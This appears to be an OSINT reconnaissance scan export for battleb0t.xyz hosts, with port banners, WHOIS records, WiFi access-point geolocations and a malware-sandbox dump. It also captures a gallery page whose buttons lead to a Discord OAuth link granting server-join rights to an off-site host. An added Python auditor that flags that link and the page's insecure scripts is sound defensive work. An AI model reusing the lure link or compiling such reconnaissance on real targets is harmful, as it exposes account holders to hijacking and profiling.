d5hR8
sGr`G
hFGxh\
\0.:H
a$QEC
o"5mw
su<<
f33Jt
yNEEt
IDATd
9LGKOA
NwqWx
s<N5xh
dNHEJrV
?B v-zfB
zX 9lkh
0cp/8
Pcwr`
sP:\J>
.H2Dy
InIPC
W$4n_
?S5qq
pRoh_
NsV`L
XHhLy
1B 2"ND
/U.m
__OjA
lcJE!
Hyfoi
Xlyfh/
rFtB6
`hPT/
c B/A
` a>A
Zl>VEY
Yq0Kxq4
Ye-wdW
3s7!B
4`0 V
EwJ/.lsQ
fyB0I0
Y"<XN/h
C 3JE
OLbC1
WhdHn
l:ZLd
Sq4RXv
!4hgr | https://funny.battleb0t.xyz/images/random_6.PNG |
| 2023-05-12 03:18:52 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://funny.battleb0t.xyz/images/withat_1.jpg |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.77): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:16 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | oldfluid.battleb0t.xyz |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.55): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
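Two things in the gallery HTML above deserve a check rather than a glance: jQuery is pulled from `http://code.jquery.com` (cleartext, so an HTTPS page will block it as mixed content), the fontawesome kit script has no `integrity` attribute, and both call-to-action buttons send the visitor to a Discord OAuth2 authorize URL whose `redirect_uri` is a different site (`yoink.site`) and whose scope includes `guilds.join`, the permission that lets the client add the authorizing user to servers. The following is an added example, not SpiderFoot code or anything from the site: it parses the page, lists cross-origin scripts loaded without SRI or over HTTP, and flags OAuth links that combine `guilds.join` with an off-site redirect. The sample is trimmed from the captured HTML; `PAGE_HOST` is assumed to be `funny.battleb0t.xyz` because that host serves the gallery's `/images/` files elsewhere in the scan.

```python
"""Audit a fetched HTML page for insecure script loading and off-site Discord OAuth joins."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

PAGE_HOST = "funny.battleb0t.xyz"  # assumed host of the captured page

# Constructed sample, trimmed from the "Funny Forehead Gallery" HTML in the scan row above.
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
</head><body>
<a href="#">#WieselOnTop</a>
<a href="https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join">Get Beamed!</a>
</body></html>"""

JOIN_SCOPES = {"guilds.join"}  # scopes that let the OAuth client act on the user's server list


class _Collector(HTMLParser):
    """Gather <script src> (with integrity) and <a href> values from a page."""

    def __init__(self):
        super().__init__()
        self.scripts = []  # (src, integrity or None)
        self.links = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append((a["src"], a.get("integrity")))
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])


def _collect(html):
    c = _Collector()
    c.feed(html)
    return c


def audit_scripts(html, page_host):
    """Return (src, issue) for each cross-origin script loaded over HTTP or without SRI."""
    issues = []
    for src, integrity in _collect(html).scripts:
        u = urlsplit(src)
        if not u.netloc or u.netloc == page_host:
            continue  # same-origin script: SRI is optional
        if u.scheme == "http":
            issues.append((src, "cleartext script: blocked as mixed content on an HTTPS page"))
        if not integrity:
            issues.append((src, "cross-origin script without Subresource Integrity"))
    return issues


def audit_oauth_links(html, page_host):
    """Flag Discord authorize links whose redirect_uri leaves page_host and whose scope can join servers."""
    flagged = []
    for href in _collect(html).links:
        u = urlsplit(href)
        if u.netloc != "discord.com" or u.path != "/api/oauth2/authorize":
            continue
        q = parse_qs(u.query)  # also percent-decodes redirect_uri and scope
        scopes = set(q.get("scope", [""])[0].split())
        redirect_host = urlsplit(q.get("redirect_uri", [""])[0]).netloc
        if scopes & JOIN_SCOPES and redirect_host != page_host:
            flagged.append({
                "client_id": q.get("client_id", [""])[0],
                "redirect_host": redirect_host,
                "scopes": sorted(scopes),
            })
    return flagged


if __name__ == "__main__":
    for src, issue in audit_scripts(SAMPLE_HTML, PAGE_HOST):
        print(f"script {src}: {issue}")
    for hit in audit_oauth_links(SAMPLE_HTML, PAGE_HOST):
        print("oauth", hit)
```

The script check reports jQuery once (cleartext; its SRI hash is present) and the fontawesome kit once (no SRI); Bootstrap passes. The OAuth check returns the single authorize link with `redirect_host` `yoink.site`, which is the fact to investigate before deciding what the page is for.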
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/Altpapier/ | Altpapier |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Hakim Evi (Net ID: 00:14:C1:2E:AE:67) | 40.2024, 29.0398 |
| 2023-05-12 02:45:09 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 104.21.6.166 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 15:16. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
| 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | oatscream (Net ID: 00:0C:E6:39:59:E1) | 39.0469, -77.4903 |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 14061 | 46.101.128.0/17 |
| 2023-05-12 02:44:24 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.109.153 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2078
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Restricted Area"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:1C:05) | 50.8897, 6.0563 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER3 (Net ID: 00:02:6F:B3:3B:AA) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:19 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:54:30) | 41.8781, -87.6298 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX55154C9AA (Net ID: 00:01:E3:54:C9:AA) | 52.3759, 4.8975 |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 16 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | nuke.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NBNCorp (Net ID: 00:09:5B:A3:EA:31) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Iceland | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:57:26 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | teamcity.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 104.21.71.14 |
| 2023-05-12 02:55:22 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://icba.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "icba.com"\n "kenwheeler.github.io"\n "kit.fontawesome.com"\n "static.addtoany.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FCF.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar21C5.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"77.72.1.42:443"\n "142.250.189.202:443"\n "104.17.24.14:443"\n "104.16.124.175:443"\n "172.67.39.148:443"\n "142.251.214.136:443"\n "142.250.189.234:443"\n "185.199.109.153:443"\n "69.16.175.42:443"\n "104.18.22.52:443"\n "8.252.188.254:80"\n "142.251.46.227:443"\n 
"142.251.46.238:443"\n "172.64.169.22:443"\n "142.251.214.131:443"\n "142.251.2.157:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2060"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_IE_EarlyTabStart_0xf90_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_ConnHashTable<2060>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_80c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2060"\n "IsoScope_80c_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab21C4.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 
file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsicba.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "cookie-law-info-gdpr_1_.css" has type "ASCII text"- [targetUID: N/A]\n "anchor_1_.htm" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "util_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "KFOmCnqEu92Fr1Mu4mxP_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. All Rights Reserved.RobotoRegularVersion 2.137; 2017Roboto-Regularht"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003980]\n "page_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "KFOlCnqEu92Fr1MmYUtfBBc9_1_.ttf" has type "TrueType Font data 18 tables 1st "GDEF" 8 names Microsoft language 0x409 Copyright 2011 Google Inc. 
All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla"- [targetUID: N/A]\n "~DFDAD05DC8204277E5.TMP" has type "data"- Location: [%TEMP%\\~DFDAD05DC8204277E5.TMP]- [targetUID: 00000000-00002060]\n "js_6_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hand_1_.png" has type "PNG image data 237 x 204 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "jquery-migrate.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "news-default_1_.png" has type "PNG image data 550 x 400 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "regenerator-runtime.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "home-america0_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 1514x813 components 3"- [targetUID: N/A]\n "cropped-icba-favicon-32x32_1_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tick_1_.png" has type "PNG image data 16 x 16 8-bit/color RGBA interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: 
"https://icba.com/"\n Pattern match: "https://icba.com"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "icba.com"\n Heuristic match: "kenwheeler.github.io"\n Heuristic match: "kit.fontawesome.com"\n Heuristic match: "static.addtoany.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 2, u'size': None, u'job_id': u'63ec913036565a096c7515a3', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', 
u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'77.72.1.42', u'142.250.189.202', u'104.17.24.14', u'104.16.124.175', u'172.67.39.148', u'142.251.214.136', u'142.250.189.234', u'185.199.109.153', u'69.16.175.42', u'104.18.22.52', u'8.252.188.254', u'142.251.46.227', u'142.251.46.238', u'172.64.169.22', u'142.251.214.131', u'142.251.2.157'], u'sha256': u'6c9318f0a4bac85f99d6040d1988a710d4f868d1e8e1a0bd50397a2df8b3073a', u'sha512': u'92c6d135a7f7364930a9be30552e09343d2f1cbfac310b763eb7280776f4205078448c64d65c324ff4902984bb4eba0f74fb83932d50bf02f71b8b980e2479bf', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://icba.com/', u'submission_id': u'63ec913036565a096c7515a4', u'created_at': u'2023-02-15T08:00:48+00:00', u'filename': None}], u'analysi | 185.199.109.153 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/nwp.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:32:00 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.1:80 | 188.114.97.0/24 |
| 2023-05-12 03:01:26 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | nwapi2.battleb0t.xyz |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c572ccdc9c6e26c-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Ashburn Square WiFi (Net ID: 00:0C:66:13:0B:72) | 39.0469, -77.4903 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | x-nf-request-id: 01H06Y2YH7X6V06YSWWEW2NH9C | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-nf-request-id": "01H06Y2YH7X6V06YSWWEW2NH9C", "content-type": "text/css; charset=UTF-8", "age": "0"} |
